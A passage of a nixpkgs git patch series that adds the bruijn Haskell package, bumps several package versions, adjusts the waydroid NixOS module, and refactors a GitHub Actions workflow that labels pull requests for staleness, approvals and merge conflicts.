'updated', + direction: 'desc', + }, + (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) + ); - const prs = await github.paginate( - github.rest.pulls.list, - { - ...context.repo, - state: 'open', - sort: 'updated', - direction: 'desc', - ...prEventCondition - }, - (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) - ); + (await Promise.allSettled(prs.flat())) + .filter(({ status }) => status == 'rejected') + .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - (await Promise.allSettled(prs.flat())) - .filter(({ status }) => status == 'rejected') - .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - - core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) + core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) + } clearInterval(reservoirUpdater) - name: Log current API rate limits From 248f4b8deb76ab68a8351868465ac31fc2898d6b Mon Sep 17 00:00:00 2001 From: Defelo Date: Sat, 21 Jun 2025 16:57:58 +0200 Subject: [PATCH 44/73] bruijn: init at 0-unstable-2025-06-23 --- pkgs/by-name/br/bruijn/generated.nix | 75 ++++++++++++++++++++++++++++ pkgs/by-name/br/bruijn/package.nix | 25 ++++++++++ pkgs/by-name/br/bruijn/update.sh | 16 ++++++ pkgs/by-name/br/bruijn/version.txt | 1 + 4 files changed, 117 insertions(+) create mode 100644 pkgs/by-name/br/bruijn/generated.nix create mode 100644 pkgs/by-name/br/bruijn/package.nix create mode 100755 pkgs/by-name/br/bruijn/update.sh create mode 100644 pkgs/by-name/br/bruijn/version.txt diff --git a/pkgs/by-name/br/bruijn/generated.nix b/pkgs/by-name/br/bruijn/generated.nix new file mode 100644 index 000000000000..cd95e0dca2a7 --- /dev/null +++ b/pkgs/by-name/br/bruijn/generated.nix @@ -0,0 +1,75 @@ +{ + mkDerivation, + array, + base, + binary, + bitstring, + bytestring, + clock, + containers, + deepseq, + directory, + fetchzip, + filepath, + haskeline, + lib, + megaparsec, + mtl, + optparse-applicative, + process, + random, + time, +}: +mkDerivation { + pname = "bruijn"; + version = "0.1.0.0"; + src = fetchzip { + url = "https://github.com/marvinborner/bruijn/archive/d60ad52f135370635db3a2db3363005670af14b8.tar.gz"; + sha256 = "182v56vc71467q8x7bp83ch6wp3kv5wgxrm53l2vvnvfqyqswpi2"; + }; + isLibrary = true; + isExecutable = true; + enableSeparateDataOutput = true; + libraryHaskellDepends = [ + array + base + binary + bitstring + bytestring + clock + containers + deepseq + directory + filepath + haskeline + megaparsec + mtl + optparse-applicative + process + random + time + ]; + executableHaskellDepends = [ + array + base + binary + bitstring + bytestring + clock + containers + deepseq + directory + filepath + haskeline + megaparsec + mtl + optparse-applicative + process + random + time + ]; + homepage = "https://github.com/githubuser/bruijn#readme"; + license = lib.licenses.mit; + mainProgram = "bruijn"; + maintainers = [ lib.maintainers.defelo ]; +} diff --git a/pkgs/by-name/br/bruijn/package.nix b/pkgs/by-name/br/bruijn/package.nix new file mode 100644 index 000000000000..981b57465a8e --- /dev/null +++ b/pkgs/by-name/br/bruijn/package.nix @@ -0,0 +1,25 @@ +{ + haskell, + haskellPackages, + lib, +}: + +let + inherit (haskell.lib.compose) justStaticExecutables overrideCabal; + + generated = haskellPackages.callPackage ./generated.nix { }; + + overrides = { + version = lib.fileContents ./version.txt; + + passthru.updateScript = ./update.sh; + + description = "Purely functional programming language based on lambda calculus and de Bruijn indices"; + homepage = "https://bruijn.marvinborner.de/"; + }; +in + +lib.pipe generated [ + (overrideCabal overrides) + justStaticExecutables +] diff --git a/pkgs/by-name/br/bruijn/update.sh b/pkgs/by-name/br/bruijn/update.sh new file mode 100755 index 000000000000..40454a4d226c --- /dev/null +++ b/pkgs/by-name/br/bruijn/update.sh @@ -0,0 +1,16 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i bash -p coreutils cabal2nix curl jq nixfmt-rfc-style + +set -euo pipefail + +cd "$(dirname "${BASH_SOURCE[0]}")" + +{ read -r rev; read -r committer_date; } \ + < <(curl ${GITHUB_TOKEN:+-u ":$GITHUB_TOKEN"} -sfL https://api.github.com/repos/marvinborner/bruijn/branches/main \ + | jq -r '.commit | .sha, .commit.committer.date') + +cabal2nix --maintainer defelo "https://github.com/marvinborner/bruijn/archive/${rev}.tar.gz" \ + | nixfmt \ + > generated.nix + +echo "0-unstable-$(date -I --date="$committer_date")" > version.txt diff --git a/pkgs/by-name/br/bruijn/version.txt b/pkgs/by-name/br/bruijn/version.txt new file mode 100644 index 000000000000..8bac9139bd76 --- /dev/null +++ b/pkgs/by-name/br/bruijn/version.txt @@ -0,0 +1 @@ +0-unstable-2025-06-23 From 9438cfd2d67afd836b6c43e29fc4f63dcf05eb06 Mon Sep 17 00:00:00 2001 From: Defelo Date: Sun, 22 Jun 2025 22:38:28 +0000 Subject: [PATCH 45/73] olivetin: 2025.6.6 -> 2025.6.22 Changelog: https://github.com/OliveTin/OliveTin/releases/tag/2025.6.22 Diff: https://github.com/OliveTin/OliveTin/compare/2025.6.6...2025.6.22 --- pkgs/by-name/ol/olivetin/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/ol/olivetin/package.nix b/pkgs/by-name/ol/olivetin/package.nix index 099f91830fc5..21eb3657b331 100644 --- a/pkgs/by-name/ol/olivetin/package.nix +++ b/pkgs/by-name/ol/olivetin/package.nix @@ -49,7 +49,7 @@ buildGoModule ( ''; outputHashMode = "recursive"; - outputHash = "sha256-KygZ7NqkfhczYy1YMR824Om4NTq06+KHa/jvmsCty3s="; + outputHash = "sha256-3CtcjqjPmK//f15aTE4bUA+moaXNz+AeWiopqWf9qq8="; }; webui = buildNpmPackage { @@ -81,13 +81,13 @@ buildGoModule ( { pname = "olivetin"; - version = "2025.6.6"; + version = "2025.6.22"; src = fetchFromGitHub { owner = "OliveTin"; repo = "OliveTin"; tag = finalAttrs.version; - hash = "sha256-yzAuhrkJEBErf9yYuRoq5B7PT0XA0w668AG5LNSSRFM="; + hash = "sha256-fNE8x0d0lnKVxy4fk3h5QrcWnMKBcxhrxpDbZYTXimc="; }; modRoot = "service"; From d9d97fda59d81255aa606f1fccf04dc9f2b6240c Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Sun, 22 Jun 2025 12:21:20 +0200 Subject: [PATCH 46/73] workflows/labels: refactor to search instead of listing PRs This doesn't provide much value in itself, yet, but is much more flexible in the next step, when also looking at much older PRs. --- .github/workflows/labels.yml | 59 +++++++++++++++++++++++------------- 1 file changed, 38 insertions(+), 21 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 7bf96fe5856d..6d727e34d5c6 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -101,6 +101,9 @@ jobs: github.hook.wrap('request', async (request, options) => { // Requests to the /rate_limit endpoint do not count against the rate limit. if (options.url == '/rate_limit') return request(options) + // Search requests are in a different resource group, which allows 30 requests / minute. + // We do less than a handful each run, so not implementing throttling for now. + if (options.url.startsWith('/search/')) return request(options) stats.requests++ if (['POST', 'PUT', 'PATCH', 'DELETE'].includes(options.method)) return writeLimits.schedule(request.bind(null, options)) @@ -131,17 +134,28 @@ jobs: if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) throw new Error('Please enter "updated within" as integer in hours.') - async function handle(pull_request, done, cutoff) { + async function handle(item) { try { const log = (k,v,skip) => { - core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) + core.info(`#${item.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) return skip } - if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) - return done() + log('Last updated at', item.updated_at) stats.prs++ - log('URL', pull_request.html_url) + log('URL', item.html_url) + + const pull_number = item.number + const issue_number = item.number + + // The search result is of a format that works for both issues and pull requests and thus + // does not have all fields of a full pull_request response. Notably, it is missing `head.sha`, + // which we need to fetch the workflow run below. When triggered via pull_request event, + // this field is already available. + const pull_request = item.head ? item : (await github.rest.pulls.get({ + ...context.repo, + pull_number + })).data const run_id = (await github.rest.actions.listWorkflowRuns({ ...context.repo, @@ -188,7 +202,7 @@ jobs: repositoryOwner: context.repo.owner, token: core.getInput('github-token') }, - path: path.resolve(pull_request.number.toString()), + path: path.resolve(pull_number.toString()), expectedHash: artifact.digest }) @@ -197,7 +211,7 @@ jobs: const before = Object.fromEntries( (await github.paginate(github.rest.issues.listLabelsOnIssue, { ...context.repo, - issue_number: pull_request.number + issue_number })) .map(({ name }) => [name, true]) ) @@ -205,17 +219,17 @@ jobs: const approvals = new Set( (await github.paginate(github.rest.pulls.listReviews, { ...context.repo, - pull_number: pull_request.number + pull_number })) .filter(review => review.state == 'APPROVED') .map(review => review.user?.id) ) const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) + JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) ).map(m => Number.parseInt(m, 10))) - const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels + const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels // Manage the labels const after = Object.assign( @@ -249,11 +263,11 @@ jobs: await github.rest.issues.setLabels({ ...context.repo, - issue_number: pull_request.number, + issue_number, labels }) } catch (cause) { - throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) + throw new Error(`Labeling #${item.number} failed.`, { cause }) } } @@ -280,18 +294,21 @@ jobs: })()) core.info('cutoff timestamp: ' + cutoff.toISOString()) - const prs = await github.paginate( - github.rest.pulls.list, + const items = await github.paginate( + github.rest.search.issuesAndPullRequests, { - ...context.repo, - state: 'open', - sort: 'updated', - direction: 'desc', - }, - (response, done) => response.data.map(pull_request => handle(pull_request, done, cutoff)) + q: [ + `repo:"${process.env.GITHUB_REPOSITORY}"`, + 'type:pr', + 'is:open', + `updated:>=${cutoff.toISOString()}` + ].join(' AND '), + // TODO: Remove in 2025-10, when it becomes the default. + advanced_search: true + } ); - (await Promise.allSettled(prs.flat())) + (await Promise.allSettled(items.map(handle))) .filter(({ status }) => status == 'rejected') .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) From e55128a079e998204d0e0721cc750ee354d0ea8e Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 19:47:22 +0200 Subject: [PATCH 47/73] workflows/labels: run on every PR eventually This replaces the manual dispatch trigger with a batched run through all pull requests every day. This has the small benefit of not having to worry about backfilling labeling after fixing bugs - and the much bigger one in being able to handle merge-conflict and stale labels properly later. For those, it's inevitable to eventually scan through all PRs. At this stage, the vast majority of PRs will still be skipped, because there won't be an eval run with artifact available. This will be improved in the next step. Technically, the workflow_dispatch trigger is kept to allow easily testing this in forks, where the scheduled jobs are disabled. The triggered job will behave similar to the scheduled job, though, and have no special inputs. --- .github/workflows/labels.yml | 85 ++++++++++++++++++++++-------------- 1 file changed, 52 insertions(+), 33 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 6d727e34d5c6..95385b482af8 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -17,18 +17,12 @@ on: NIXPKGS_CI_APP_PRIVATE_KEY: required: true workflow_dispatch: - inputs: - updatedWithin: - description: 'Updated within [hours]' - type: number - required: false - default: 0 # everything since last run concurrency: # This explicitly avoids using `run_id` for the concurrency key to make sure that only - # *one* non-PR run can run at a time. + # *one* scheduled run can run at a time. group: labels-${{ github.workflow }}-${{ github.event_name }}-${{ github.event.pull_request.number }} - # PR- and manually-triggered runs will be cancelled, but scheduled runs will be queued. + # PR-triggered runs will be cancelled, but scheduled runs will be queued. cancel-in-progress: ${{ github.event_name != 'schedule' }} # This is used as fallback without app only. @@ -69,8 +63,6 @@ jobs: - name: Labels from API data and Eval results uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 - env: - UPDATED_WITHIN: ${{ inputs.updatedWithin }} with: github-token: ${{ steps.app-token.outputs.token || github.token }} script: | @@ -131,9 +123,6 @@ jobs: const reservoirUpdater = setInterval(updateReservoir, 60 * 1000) process.on('uncaughtException', () => clearInterval(reservoirUpdater)) - if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) - throw new Error('Please enter "updated within" as integer in hours.') - async function handle(item) { try { const log = (k,v,skip) => { @@ -274,27 +263,22 @@ jobs: if (context.payload.pull_request) { await handle(context.payload.pull_request) } else { - const cutoff = new Date(await (async () => { - // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last - // option if the updatedWithin parameter is set to 0, which is the default. - const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) - if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 + const workflowData = (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true, + per_page: 1 + })).data - // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far - // as the last successful run of this workflow to make sure we are not leaving anyone - // behind on GHA failures. - // Defaults to go back 1 hour on the first run. - return (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true - })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 - })()) + // Go back as far as the last successful run of this workflow to make sure + // we are not leaving anyone behind on GHA failures. + // Defaults to go back 1 hour on the first run. + const cutoff = new Date(workflowData.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000) core.info('cutoff timestamp: ' + cutoff.toISOString()) - const items = await github.paginate( + const updatedItems = await github.paginate( github.rest.search.issuesAndPullRequests, { q: [ @@ -306,9 +290,44 @@ jobs: // TODO: Remove in 2025-10, when it becomes the default. advanced_search: true } - ); + ) - (await Promise.allSettled(items.map(handle))) + const allOptions = { + q: [ + `repo:"${process.env.GITHUB_REPOSITORY}"`, + 'type:pr', + 'is:open' + ].join(' AND '), + sort: 'created', + direction: 'asc', + // TODO: Remove in 2025-10, when it becomes the default. + advanced_search: true + } + + const { total_count: total_pulls } = (await github.rest.search.issuesAndPullRequests({ + ...allOptions, + per_page: 1 + })).data + const { total_count: total_runs } = workflowData + const allItems = (await github.rest.search.issuesAndPullRequests({ + ...allOptions, + per_page: 100, + // We iterate through pages of 100 items across scheduled runs. With currently ~7000 open PRs and + // up to 6*24=144 scheduled runs per day, we hit every PR twice each day. + // We might not hit every PR on one iteration, because the pages will shift slightly when + // PRs are closed or merged. We assume this to be OK on the bigger scale, because a PR which was + // missed once, would have to move through the whole page to be missed again. This is very unlikely, + // so it should certainly be hit on the next iteration. + // TODO: Evaluate after a while, whether the above holds still true and potentially implement + // an overlap between runs. + page: total_runs % Math.ceil(total_pulls / 100) + })).data.items + + // Some items might be in both search results, so filtering out duplicates as well. + const items = [].concat(updatedItems, allItems) + .filter((thisItem, idx, arr) => idx == arr.findIndex(firstItem => firstItem.number == thisItem.number)) + + ;(await Promise.allSettled(items.map(handle))) .filter(({ status }) => status == 'rejected') .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) From 63b9355ed892b715a881f95e71fc3c22c67bb641 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 22:18:25 +0200 Subject: [PATCH 48/73] workflows/labels: handle missing eval results gracefully We keep working through the PR, even though we don't have any eval results. This will allow actually managing labels for much older PRs as well. Most importantly, it will allow merge-conflict and stale-labeling next. --- .github/workflows/labels.yml | 76 ++++++++++++++++++++---------------- 1 file changed, 43 insertions(+), 33 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 95385b482af8..dc1c9344717f 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -165,12 +165,12 @@ jobs: head_sha: pull_request.head.sha })).data.workflow_runs[0]?.id - // Newer PRs might not have run Eval to completion, yet. We can skip them, because this - // job will be run as part of that Eval run anyway. - if (log('Last eval run', run_id ?? '', !run_id)) - return; + // Newer PRs might not have run Eval to completion, yet. + // Older PRs might not have an eval.yml workflow, yet. + // In either case we continue without fetching an artifact on a best-effort basis. + log('Last eval run', run_id ?? '') - const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ + const artifact = run_id && (await github.rest.actions.listWorkflowRunArtifacts({ ...context.repo, run_id, name: 'comparison' @@ -179,21 +179,22 @@ jobs: // Instead of checking the boolean artifact.expired, we will give us a minute to // actually download the artifact in the next step and avoid that race condition. // Older PRs, where the workflow run was already eval.yml, but the artifact was not - // called "comparison", yet, will be skipped as well. - const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) - if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) - return; - stats.artifacts++ + // called "comparison", yet, will skip the download. + const expired = !artifact || new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) + log('Artifact expires at', artifact?.expires_at ?? '') + if (!expired) { + stats.artifacts++ - await artifactClient.downloadArtifact(artifact.id, { - findBy: { - repositoryName: context.repo.repo, - repositoryOwner: context.repo.owner, - token: core.getInput('github-token') - }, - path: path.resolve(pull_number.toString()), - expectedHash: artifact.digest - }) + await artifactClient.downloadArtifact(artifact.id, { + findBy: { + repositoryName: context.repo.repo, + repositoryOwner: context.repo.owner, + token: core.getInput('github-token') + }, + path: path.resolve(pull_number.toString()), + expectedHash: artifact.digest + }) + } // Create a map (Label -> Boolean) of all currently set labels. // Each label is set to True and can be disabled later. @@ -214,32 +215,41 @@ jobs: .map(review => review.user?.id) ) - const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) - ).map(m => Number.parseInt(m, 10))) - - const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels - - // Manage the labels + // Manage most of the labels, without eval results const after = Object.assign( {}, before, - // Ignore `evalLabels` if it's an array. - // This can happen for older eval runs, before we switched to objects. - // The old eval labels would have been set by the eval run, - // so now they'll be present in `before`. - // TODO: Simplify once old eval results have expired (~2025-10) - (Array.isArray(evalLabels) ? undefined : evalLabels), { '12.approvals: 1': approvals.size == 1, '12.approvals: 2': approvals.size == 2, '12.approvals: 3+': approvals.size >= 3, - '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), '12.first-time contribution': [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), } ) + // Manage labels based on eval results + if (!expired) { + const maintainers = new Set(Object.keys( + JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) + ).map(m => Number.parseInt(m, 10))) + + const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels + + Object.assign( + after, + // Ignore `evalLabels` if it's an array. + // This can happen for older eval runs, before we switched to objects. + // The old eval labels would have been set by the eval run, + // so now they'll be present in `before`. + // TODO: Simplify once old eval results have expired (~2025-10) + (Array.isArray(evalLabels) ? undefined : evalLabels), + { + '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), + } + ) + } + // No need for an API request, if all labels are the same. const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) if (log('Has changes', hasChanges, !hasChanges)) From 58dd9630c38123707c6acd97fb65f33f36c70af1 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 22:33:12 +0200 Subject: [PATCH 49/73] workflows/labels: manage stale label for pull requests This manages the `2. status: stale` label for pull requests only (not issues, yet) with the following conditions: - The last event on the timeline of the Pull Request counts. - Labeling and unlabeling of any kind are ignored. - Older than 180 days are stale. - Security labeled PRs are never stale. To handle this label correctly, it's important to go through all pull requests. Any approach to limit the list of PRs via search are not going to work: - Filtering by `updated` is not going to work, because it includes the last time that *a label was set* on the PR. To actually find out whether a PR is stale or not, the timeline of events needs to be looked at. - Filtering by an existing stale label is not going to work either, because such a label might have been added manually and thus breaking the rules we set up here. Thus any existing label needs to be confirmed as well. --- .github/workflows/labels.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index dc1c9344717f..99a5dcf7004d 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -215,11 +215,28 @@ jobs: .map(review => review.user?.id) ) + const latest_event_at = new Date( + (await github.paginate( + github.rest.issues.listEventsForTimeline, + { + ...context.repo, + issue_number, + per_page: 100 + } + )) + // We also ignore base_ref_force_pushed, which will not happen in nixpkgs, but + // is very useful for testing in forks. + .findLast(({ event }) => !['labeled', 'unlabeled', 'base_ref_force_pushed'].includes(event)) + ?.created_at ?? item.created_at + ) + const stale_at = new Date(new Date().setDate(new Date().getDate() - 180)) + // Manage most of the labels, without eval results const after = Object.assign( {}, before, { + '2.status: stale': !before['1.severity: security'] && latest_event_at < stale_at, '12.approvals: 1': approvals.size == 1, '12.approvals: 2': approvals.size == 2, '12.approvals: 3+': approvals.size >= 3, From 36e9fe9e7d8537438cf5d8f3cf197921f171d154 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Mon, 23 Jun 2025 22:53:41 +0200 Subject: [PATCH 50/73] workflows/labels: manage merge-conflict label for pull requests The code comments describe much better what we do then a commit message could ever do. --- .github/workflows/labels.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index 99a5dcf7004d..c3bc9301f67f 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -141,6 +141,8 @@ jobs: // does not have all fields of a full pull_request response. Notably, it is missing `head.sha`, // which we need to fetch the workflow run below. When triggered via pull_request event, // this field is already available. + // This API request is also important for the merge-conflict label, because it triggers the + // creation of a new test merge commit. This is needed to actually determine the state of a PR. const pull_request = item.head ? item : (await github.rest.pulls.get({ ...context.repo, pull_number @@ -236,6 +238,18 @@ jobs: {}, before, { + // We intentionally don't use the mergeable or mergeable_state attributes. + // Those have an intermediate state while the test merge commit is created. + // This doesn't work well for us, because we might have just triggered another + // test merge commit creation by request the pull request via API at the start + // of this function. + // The attribute merge_commit_sha keeps the old value of null or the hash *until* + // the new test merge commit has either successfully been created or failed so. + // This essentially means we are updating the merge conflict label in two steps: + // On the first pass of the day, we just fetch the pull request, which triggers + // the creation. At this stage, the label is likely not updated, yet. + // The second pass will then read the result from the first pass and set the label. + '2.status: merge conflict': !pull_request.merge_commit_sha, '2.status: stale': !before['1.severity: security'] && latest_event_at < stale_at, '12.approvals: 1': approvals.size == 1, '12.approvals: 2': approvals.size == 2, From ee0937ff0db78d87f57165c89038c0f1dfd22fa4 Mon Sep 17 00:00:00 2001 From: wxt <3264117476@qq.com> Date: Sun, 22 Jun 2025 08:02:37 +0800 Subject: [PATCH 51/73] nixos/waydroid: allow override waydroid --- nixos/modules/virtualisation/waydroid.nix | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/nixos/modules/virtualisation/waydroid.nix b/nixos/modules/virtualisation/waydroid.nix index f9891023291c..a26bddc393ae 100644 --- a/nixos/modules/virtualisation/waydroid.nix +++ b/nixos/modules/virtualisation/waydroid.nix @@ -8,7 +8,6 @@ let cfg = config.virtualisation.waydroid; kCfg = config.lib.kernelConfig; - kernelPackages = config.boot.kernelPackages; waydroidGbinderConf = pkgs.writeText "waydroid.conf" '' [Protocol] /dev/binder = aidl2 @@ -26,6 +25,7 @@ in options.virtualisation.waydroid = { enable = lib.mkEnableOption "Waydroid"; + package = lib.mkPackageOption pkgs "waydroid" { }; }; config = lib.mkIf cfg.enable { @@ -49,7 +49,7 @@ in environment.etc."gbinder.d/waydroid.conf".source = waydroidGbinderConf; - environment.systemPackages = with pkgs; [ waydroid ]; + environment.systemPackages = [ cfg.package ]; networking.firewall.trustedInterfaces = [ "waydroid0" ]; @@ -63,7 +63,7 @@ in serviceConfig = { Type = "dbus"; UMask = "0022"; - ExecStart = "${pkgs.waydroid}/bin/waydroid -w container start"; + ExecStart = "${cfg.package}/bin/waydroid -w container start"; BusName = "id.waydro.Container"; }; }; @@ -72,7 +72,7 @@ in "d /var/lib/misc 0755 root root -" # for dnsmasq.leases ]; - services.dbus.packages = with pkgs; [ waydroid ]; + services.dbus.packages = [ cfg.package ]; }; } From e1d83e3cee69a59ed9b9df80d1441bb607b24f91 Mon Sep 17 00:00:00 2001 From: wxt <3264117476@qq.com> Date: Sun, 22 Jun 2025 08:02:45 +0800 Subject: [PATCH 52/73] waydroid: adopt --- pkgs/by-name/wa/waydroid/package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pkgs/by-name/wa/waydroid/package.nix b/pkgs/by-name/wa/waydroid/package.nix index c4c6128770e7..446c15d1bf83 100644 --- a/pkgs/by-name/wa/waydroid/package.nix +++ b/pkgs/by-name/wa/waydroid/package.nix @@ -108,6 +108,6 @@ python3Packages.buildPythonApplication rec { homepage = "https://github.com/waydroid/waydroid"; license = lib.licenses.gpl3Only; platforms = lib.platforms.linux; - maintainers = with lib.maintainers; [ ]; + maintainers = with lib.maintainers; [ bot-wxt1221 ]; }; } From 867c79b3c9f7fc3af5db488e866da6cf965353c2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Sandro=20J=C3=A4ckel?= Date: Mon, 16 Jun 2025 00:16:02 +0200 Subject: [PATCH 53/73] libutil: fix splicing of libblake3 --- .../package-management/nix/modular/src/libutil/package.nix | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/pkgs/tools/package-management/nix/modular/src/libutil/package.nix b/pkgs/tools/package-management/nix/modular/src/libutil/package.nix index 3e96aa0660c8..7ac84405cd24 100644 --- a/pkgs/tools/package-management/nix/modular/src/libutil/package.nix +++ b/pkgs/tools/package-management/nix/modular/src/libutil/package.nix @@ -27,9 +27,7 @@ mkMesonLibrary (finalAttrs: { [ brotli ] - ++ lib.optional (lib.versionAtLeast version "2.27") [ - libblake3 - ] + ++ lib.optional (lib.versionAtLeast version "2.27") libblake3 ++ [ libsodium openssl From 4853556b1f386a72aa3b56672f28083724257d6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Sandro=20J=C3=A4ckel?= Date: Wed, 18 Jun 2025 16:59:34 +0200 Subject: [PATCH 54/73] nix: fix another lib.optional taking a list --- pkgs/tools/package-management/nix/common-autoconf.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pkgs/tools/package-management/nix/common-autoconf.nix b/pkgs/tools/package-management/nix/common-autoconf.nix index 01b87cddc17d..1d7ed8cba374 100644 --- a/pkgs/tools/package-management/nix/common-autoconf.nix +++ b/pkgs/tools/package-management/nix/common-autoconf.nix @@ -111,7 +111,7 @@ let "shadowstack" ] ++ lib.optional stdenv.hostPlatform.isMusl "fortify"; - nativeInstallCheckInputs = lib.optional atLeast224 [ + nativeInstallCheckInputs = lib.optionals atLeast224 [ git man ]; From dd3ce1ee90f7eccd802be74a49c13b03e8fdcaa8 Mon Sep 17 00:00:00 2001 From: Kerstin Humm Date: Tue, 24 Jun 2025 13:01:19 +0200 Subject: [PATCH 55/73] weblate: 5.12.1 -> 5.12.2 Changelog: https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.12.2 --- pkgs/by-name/we/weblate/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/we/weblate/package.nix b/pkgs/by-name/we/weblate/package.nix index 259f5d06c125..b0500def65f7 100644 --- a/pkgs/by-name/we/weblate/package.nix +++ b/pkgs/by-name/we/weblate/package.nix @@ -27,7 +27,7 @@ let in python.pkgs.buildPythonApplication rec { pname = "weblate"; - version = "5.12.1"; + version = "5.12.2"; pyproject = true; @@ -40,7 +40,7 @@ python.pkgs.buildPythonApplication rec { owner = "WeblateOrg"; repo = "weblate"; tag = "weblate-${version}"; - hash = "sha256-8tqPxvSvVG1j/TGMozihtBYsn7oly41lP4iK3BwTmVk="; + hash = "sha256-YaP0lhL7E0pv3ZyfpQ47CjhrzjJPDwGpSTcgXDaMZdA="; }; patches = [ From 8a4770fc7b2f75766822256c407d1b95f800614a Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 13:34:38 +0000 Subject: [PATCH 56/73] cargo-show-asm: 0.2.49 -> 0.2.50 --- pkgs/by-name/ca/cargo-show-asm/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/ca/cargo-show-asm/package.nix b/pkgs/by-name/ca/cargo-show-asm/package.nix index 9cfb0546a5f3..b1203e41f8e1 100644 --- a/pkgs/by-name/ca/cargo-show-asm/package.nix +++ b/pkgs/by-name/ca/cargo-show-asm/package.nix @@ -10,15 +10,15 @@ rustPlatform.buildRustPackage rec { pname = "cargo-show-asm"; - version = "0.2.49"; + version = "0.2.50"; src = fetchCrate { inherit pname version; - hash = "sha256-DH3jE7nGdwIQVHk80EsC4gYh5+wk6VMWS0d+jZYnX1I="; + hash = "sha256-BmRcaZKAWwRJQyVsymudDg6l7O9pcE2s+Y9VgaJ/Q48="; }; useFetchCargoVendor = true; - cargoHash = "sha256-R+I6EVzHvI1Et4nvxENc3IvfmSLr/g77x4wCMNb2R88="; + cargoHash = "sha256-+NOk3lzBsgPs1AIUfwWP4sOKSV3XPZsPxl0QNPXPgZQ="; nativeBuildInputs = [ installShellFiles From c366efa6e2816c2cb48b3018fe00ceb8ca6cbc81 